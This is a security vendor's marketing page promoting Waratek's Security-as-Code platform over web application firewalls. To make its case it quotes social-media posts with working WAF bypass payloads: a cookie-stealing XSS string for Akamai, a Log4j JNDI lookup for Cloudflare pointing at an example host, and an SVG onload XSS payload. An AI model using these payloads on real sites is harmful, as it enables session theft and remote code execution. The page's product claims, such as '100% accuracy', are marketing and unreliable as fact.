Is Your Current Tooling Helping You Scale?

Don't Make Us WAF

Who doesn't love the smell of hot regex in the morning? It can be fun at times; even a little cathartic...

Until it's 3am and you're tuning the same rule for the 4th time.

We're not saying WAFs are bad. You need one to be SOC 2 compliant. But we are saying there's a better way.

What makes us WAF

WAFs focus on a lagging indicator

WAFs are essentially large data pipelines. They ingest, transform, and analyze HTTP request payloads to determine risk.

These payloads are a symptom of an action that is several steps removed from what's actually happening in the application.

Because of this lack of context, false positives and negatives happen.

WAFs lack proximity to fully secure apps

This lack of proximity leaves room for breaches and attacks from other angles, because pattern matching is the only defense a WAF offers.

When you perform security in the application layer, there are no gaps between your apps and the security provided.

Don't take our word for it

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> urldecode <!--><svg onload='top[/al/.source+/ert/.source](document.cookie)'>
I hacked the biggest crypto exchange in Indonesia && WAF Bypass https://youtube.com/watch?v=mDWu_g6d24o #bugbounty #sqlmap #SQLi
In this post, I will explain how I found a Blind XXE injection on PDF Generator that was vulnerable to CVE-2019-12154. However, in order to exfiltrate data, I had to bypass some WAF restrictions. #BugBounty https://t.co/cu2MgvEW0J
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :
#CloudFlare #WAF bypassed using Rudolfo's ( @brutelogic) method, thank you for this payload, senhor. Payload: <Svg Only=1 OnLoad=confirm(1)> https://twitter.com/brutelogic/status/1495769940615442434?lang=en #bugbountytips #WAFBypass

What's the solution?

Security-as-Code provides protection as your code executes for immutable, continuous security that protects from every direction, in every request, across all your apps.

  • Eliminate toil spent on false positives and negatives
  • Mitigate risk of vulnerability regressions after deployment
  • Secure COTS on-premise or in private and public clouds
  • Automate the remediation of code vulnerabilities

Waratek's Java Security Platform not only found the cryptominer we had, but securely removed it within 48 hours, stopping us from having to rebuild our solution from scratch.

Reliably protect applications at enterprise scale with immutable Security-as-Code

Security that's inseparable from the applications it's protecting

When a vulnerable call is made, Waratek Secure performs a checksum check and tells your application to ignore the code.

A healthy version of the code is returned instead in real-time as defined by your policy.

Additional calls to that vulnerability fetch the sanitized version, resulting in even faster execution.

  • Decrease attack surface by securing the root of the target
  • Reduce risk with automatic policy enforcement on every request
  • Eliminate false positives & negatives by fixing vulnerable code

Publish changes to your security policy without redeploying apps

Accelerate time-to-remediate with instant security patches that take effect as your applications are running without needing to redeploy.

This approach to security reduces potential attacker dwell time to zero and keeps business continuity moving forward.

  • Reduce the time for security changes to take effect
  • Immutably protect against vulnerable injections in the CI/CD pipeline
  • Apply security constantly rather than at a single point in time

Declaratively secure every deployment and improve productivity

Enable immutable control through policy that allows developers to move fast without fear of vulnerability regression.

Every declarative rule in your policy is immutable, meaning there's no code in the codebase now or in the future that can override the security defined in your policy.

  • Define a rule once & apply it to any code added in the future
  • Achieve 100% accuracy with zero false positives & negatives
  • Deploy new rules easily without redeploying applications

Ready to scale Security with modern software development?

Work with us to accelerate your adoption of Security-as-Code to deliver application security at scale.